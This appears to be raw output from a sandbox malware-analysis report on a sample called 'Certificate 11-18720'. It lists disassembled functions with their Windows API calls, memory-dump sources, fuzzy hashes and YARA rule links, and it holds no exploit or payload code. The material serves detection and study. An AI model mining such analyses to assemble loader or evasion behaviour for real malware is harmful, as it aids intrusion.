                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$MoveWindow
                                                                                    • String ID: Listbox
                                                                                    • API String ID: 3315199576-2633736733
                                                                                    • Opcode ID: 49c75a781e074bcc16b7f54e658ec1acc934d5acac4deb8c032ea2fd12f5841a
                                                                                    • Instruction ID: f93fa7e1cc939448be55608d9b06164cd70ff0b11ff7f93b72f3906ff522192f
                                                                                    • Opcode Fuzzy Hash: 49c75a781e074bcc16b7f54e658ec1acc934d5acac4deb8c032ea2fd12f5841a
                                                                                    • Instruction Fuzzy Hash: 79218631610128BFDB119F54DC45EFB3BABEF8A760F018129F95557290C6719C51CBB0
                                                                                    Function 0062A409 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 0062A46D
                                                                                    • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 0062A482
                                                                                    • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 0062A48F
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend
                                                                                    • String ID: msctls_trackbar32
                                                                                    • API String ID: 3850602802-1010561917
                                                                                    • Opcode ID: 12fbc6529f0bb79cf0c770140a2e8dd3395c891d1aea4d6c85463ad0eadadde0
                                                                                    • Instruction ID: 23bfcd701dcc43b5fe8aa1918615895ac2e0a92041009a1d8b82ce17aa5ee84b
                                                                                    • Opcode Fuzzy Hash: 12fbc6529f0bb79cf0c770140a2e8dd3395c891d1aea4d6c85463ad0eadadde0
                                                                                    • Instruction Fuzzy Hash: 9611EB71200618BFDF205FA4DC49FE737AAEF89754F014128FA4596191D6B2E811CB24
                                                                                    Function 005E2287 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,005E2350,?), ref: 005E22A1
                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 005E22A8
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressLibraryLoadProc
                                                                                    • String ID: RoInitialize$combase.dll
                                                                                    • API String ID: 2574300362-340411864
                                                                                    • Opcode ID: a8e8bd7769d2550dffcc5c0a1879c20171374d31c448e2393f24cb56ea902441
                                                                                    • Instruction ID: 6580102da4df2d144243c8bb68c021e3043839727176876f70043b54e27250c4
                                                                                    • Opcode Fuzzy Hash: a8e8bd7769d2550dffcc5c0a1879c20171374d31c448e2393f24cb56ea902441
                                                                                    • Instruction Fuzzy Hash: 32E04874A90300BBEB505FB1DC4DB1A3A57BB45715F016914F285D50E0CBB84084CF04
                                                                                    Function 005E235C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,005E2276), ref: 005E2376
                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 005E237D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressLibraryLoadProc
                                                                                    • String ID: RoUninitialize$combase.dll
                                                                                    • API String ID: 2574300362-2819208100
                                                                                    • Opcode ID: 7aee48f112bfea3f99e7adf130d2ad498ee50f62124b2269d15d2a5a37cd7b46
                                                                                    • Instruction ID: b7e713e2903e95d11ef1d546cdde2d1eb7c9566108af611483ac5e262736f570
                                                                                    • Opcode Fuzzy Hash: 7aee48f112bfea3f99e7adf130d2ad498ee50f62124b2269d15d2a5a37cd7b46
                                                                                    • Instruction Fuzzy Hash: D2E0B6B4A54700BBEB755FA1ED0DB093A6BB705B1AF112D14F289D20B4CBB85448CB14
                                                                                    Function 0063AC59 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: LocalTime__swprintf
                                                                                    • String ID: %.3d$WIN_XPe
                                                                                    • API String ID: 2070861257-2409531811
                                                                                    • Opcode ID: 113d0406f1bc4dfa3d795a91f52cdde0a030f492d7259a395ca9e3351e2148c6
                                                                                    • Instruction ID: b482bec4efab85b272d4568f93c144daf961f0d52794d85a252f8db0258dd273
                                                                                    • Opcode Fuzzy Hash: 113d0406f1bc4dfa3d795a91f52cdde0a030f492d7259a395ca9e3351e2148c6
                                                                                    • Instruction Fuzzy Hash: 72E0ECB18046189BCB1097908D099FA777EAB04741F102492F986A1100D6359B96FA62
                                                                                    Function 00622205 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,006221FB,?,006223EF), ref: 00622213
                                                                                    • GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 00622225
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressLibraryLoadProc
                                                                                    • String ID: GetProcessId$kernel32.dll
                                                                                    • API String ID: 2574300362-399901964
                                                                                    • Opcode ID: 72660962c69f6651cbadc82381cf924a761f743d5b884c0a982724059aab89c7
                                                                                    • Instruction ID: 89a921ef7777fca4a94e39a979c69148ddc29963d2b0f8ca24ef755080715a41
                                                                                    • Opcode Fuzzy Hash: 72660962c69f6651cbadc82381cf924a761f743d5b884c0a982724059aab89c7
                                                                                    • Instruction Fuzzy Hash: 49D0A7B8910B23EFD7214F30F81864176D7EB05300B019419EC45E3650EB71D880CB50
                                                                                    Function 005C42F6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,00000000,005C42EC,?,005C42AA,?), ref: 005C4304
                                                                                    • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 005C4316
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressLibraryLoadProc
                                                                                    • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                    • API String ID: 2574300362-1355242751
                                                                                    • Opcode ID: ba68fffe7b5772950c31d2259dc1a5262be0756ad2edee473db550cb771150dc
                                                                                    • Instruction ID: f40566f681c7618f258647c5ce3e54058e8e125bf884af542b1111a2bfe306b2
                                                                                    • Opcode Fuzzy Hash: ba68fffe7b5772950c31d2259dc1a5262be0756ad2edee473db550cb771150dc
                                                                                    • Instruction Fuzzy Hash: 9ED0A774900B139FC7208F60EC1CF017AD5BB05701B01881DE945D3260E7B0C8C0CB10
                                                                                    Function 005C434B Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,005C41BB,005C4341,?,005C422F,?,005C41BB,?,?,?,?,005C39FE,?,00000001), ref: 005C4359
                                                                                    • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 005C436B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressLibraryLoadProc
                                                                                    • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                    • API String ID: 2574300362-3689287502
                                                                                    • Opcode ID: aa1e4b943f208bafac4c0428582039f910332c1fef0270d5eb63c2834c919568
                                                                                    • Instruction ID: 966091016cc0baa242dbfb9acee9bb3c6f76e1702c6a121247bddb3762788f2b
                                                                                    • Opcode Fuzzy Hash: aa1e4b943f208bafac4c0428582039f910332c1fef0270d5eb63c2834c919568
                                                                                    • Instruction Fuzzy Hash: 7BD0A774900B139FC7204F70E818F037AE5BB11B15B01881DE895D3250E7B0D8C0CB10
                                                                                    Function 00600564 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • LoadLibraryA.KERNEL32(oleaut32.dll,00000000,0060052F,?,006006D7), ref: 00600572
                                                                                    • GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 00600584
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressLibraryLoadProc
                                                                                    • String ID: UnRegisterTypeLibForUser$oleaut32.dll
                                                                                    • API String ID: 2574300362-1587604923
                                                                                    • Opcode ID: 903772872a78b15e965e195d1de689c1faa82fc57c5a678e511c3d6e98db36d6
                                                                                    • Instruction ID: f4d9f6b8ab463d5ff70495de5379812652213e7196ed1dca821afdea68395886
                                                                                    • Opcode Fuzzy Hash: 903772872a78b15e965e195d1de689c1faa82fc57c5a678e511c3d6e98db36d6
                                                                                    • Instruction Fuzzy Hash: 85D05E349903129AD7205F30AC08B4277F6AB05310F118419EC45A2290D6B4C4808B20
                                                                                    Function 00600539 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • LoadLibraryA.KERNEL32(oleaut32.dll,?,0060051D,?,006005FE), ref: 00600547
                                                                                    • GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 00600559
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressLibraryLoadProc
                                                                                    • String ID: RegisterTypeLibForUser$oleaut32.dll
                                                                                    • API String ID: 2574300362-1071820185
                                                                                    • Opcode ID: 2c66d9e2befa75f619e95b01672111569c944f337336e8745b002c597f6bd15b
                                                                                    • Instruction ID: 4671338b44513e9c0ff0c5b9eb789668176dedd28523b3a17f25de3d92a881e6
                                                                                    • Opcode Fuzzy Hash: 2c66d9e2befa75f619e95b01672111569c944f337336e8745b002c597f6bd15b
                                                                                    • Instruction Fuzzy Hash: 6CD0A774980713DFD7208F30EC0874277E6AB01301F11C41DE88AD3290D674C880CA10
                                                                                    Function 0061ECC8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,0061ECBE,?,0061EBBB), ref: 0061ECD6
                                                                                    • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0061ECE8
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressLibraryLoadProc
                                                                                    • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                                    • API String ID: 2574300362-1816364905
                                                                                    • Opcode ID: 8ef553a82242cd24c0e3e96a5f8a316071f7bc1de43b568a820e36ca69a10db4
                                                                                    • Instruction ID: 0093928a0e44c813176f875e312ef17a7553657deef9dbde33830857f2ce9896
                                                                                    • Opcode Fuzzy Hash: 8ef553a82242cd24c0e3e96a5f8a316071f7bc1de43b568a820e36ca69a10db4
                                                                                    • Instruction Fuzzy Hash: BDD0A7749007239FCB205F60EC4868276E6AB02300B05C419FC59D3250DF74C8C0DB50
                                                                                    Function 0061BADD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,00000000,0061BAD3,00000001,0061B6EE,?,0065DC00), ref: 0061BAEB
                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 0061BAFD
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressLibraryLoadProc
                                                                                    • String ID: GetModuleHandleExW$kernel32.dll
                                                                                    • API String ID: 2574300362-199464113
                                                                                    • Opcode ID: 5486fc990b57b52e506feb09d821fd1fc91d73fcb9afeeb76c315ec6307f9408
                                                                                    • Instruction ID: 7acf7e74774e259f720b31944dd13cd6b140316f0df518819d313426793b44b8
                                                                                    • Opcode Fuzzy Hash: 5486fc990b57b52e506feb09d821fd1fc91d73fcb9afeeb76c315ec6307f9408
                                                                                    • Instruction Fuzzy Hash: 47D05274D04B13DEC7309F20A848A9276EAAB01300B25A42AB88BD2650EBB0C880CA10
                                                                                    Function 00623BDB Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • LoadLibraryA.KERNEL32(advapi32.dll,?,00623BD1,?,00623E06), ref: 00623BE9
                                                                                    • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00623BFB
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressLibraryLoadProc
                                                                                    • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                    • API String ID: 2574300362-4033151799
                                                                                    • Opcode ID: df0dbe84e28551d6326be0f22ce8c872196d93cdf9410fcf123b4cfdddf06eed
                                                                                    • Instruction ID: a365e37916d9ac5956508bc5add981ef48fffb43eda162b87d31bcee984fe7ac
                                                                                    • Opcode Fuzzy Hash: df0dbe84e28551d6326be0f22ce8c872196d93cdf9410fcf123b4cfdddf06eed
                                                                                    • Instruction Fuzzy Hash: 9ED09EB4B00B729AD7205B65A808642BAA6AB06715B119459E859A2350DBB4D4848E50
                                                                                    Function 005F9B30 Relevance: 6.3, APIs: 4, Instructions: 306COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 237972f0f20242f4466ae1e28ff00f4113f74346ca798858349c71bc7d7e461b
                                                                                    • Instruction ID: 3d776dcdaed088fac43f6dfb4ef88d5ad9db87dd4c6c03e17836d5981ca3d27c
                                                                                    • Opcode Fuzzy Hash: 237972f0f20242f4466ae1e28ff00f4113f74346ca798858349c71bc7d7e461b
                                                                                    • Instruction Fuzzy Hash: 7AC13975A0061AEBCB14DF94C884BBEBBB9FF88704F104599EA05EB251D734EE41DB90
                                                                                    Function 0061AA84 Relevance: 6.3, APIs: 4, Instructions: 268COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CoInitialize.OLE32(00000000), ref: 0061AAB4
                                                                                    • CoUninitialize.OLE32 ref: 0061AABF
                                                                                      • Part of subcall function 00600213: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0060027B
                                                                                    • VariantInit.OLEAUT32(?), ref: 0061AACA
                                                                                    • VariantClear.OLEAUT32(?), ref: 0061AD9D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                                    • String ID:
                                                                                    • API String ID: 780911581-0
                                                                                    • Opcode ID: 00ef0ae27b03d52771d81756bb87fff63c5b2dbaed1b028a06c12751552388be
                                                                                    • Instruction ID: 2ccca54f595228872b33df7d05a8695f2c73fcc2ec8fa16d4dc106eb7317ed77
                                                                                    • Opcode Fuzzy Hash: 00ef0ae27b03d52771d81756bb87fff63c5b2dbaed1b028a06c12751552388be
                                                                                    • Instruction Fuzzy Hash: 6BA14B75604B429FCB10DF94C485B9AB7E6BF88710F18484DF9969B3A2CB30ED45CB86
                                                                                    Function 005F91CC Relevance: 6.2, APIs: 4, Instructions: 201memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Variant$AllocClearCopyInitString
                                                                                    • String ID:
                                                                                    • API String ID: 2808897238-0
                                                                                    • Opcode ID: 8bde9789dd2f2b0e92343e369030041e8834173d24fc6f8e0609d604e2ce5cf6
                                                                                    • Instruction ID: 4d4542b9a9c73a0aec9f91b23800372af7ab7c73aa905b5db72de7ea4a6b3f78
                                                                                    • Opcode Fuzzy Hash: 8bde9789dd2f2b0e92343e369030041e8834173d24fc6f8e0609d604e2ce5cf6
                                                                                    • Instruction Fuzzy Hash: CC519834A00B0A9BDB24AF69D495B3EBBE9FF45314F209C1FE646C72D1DB7898408705
                                                                                    Function 005E365B Relevance: 6.2, APIs: 4, Instructions: 162COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
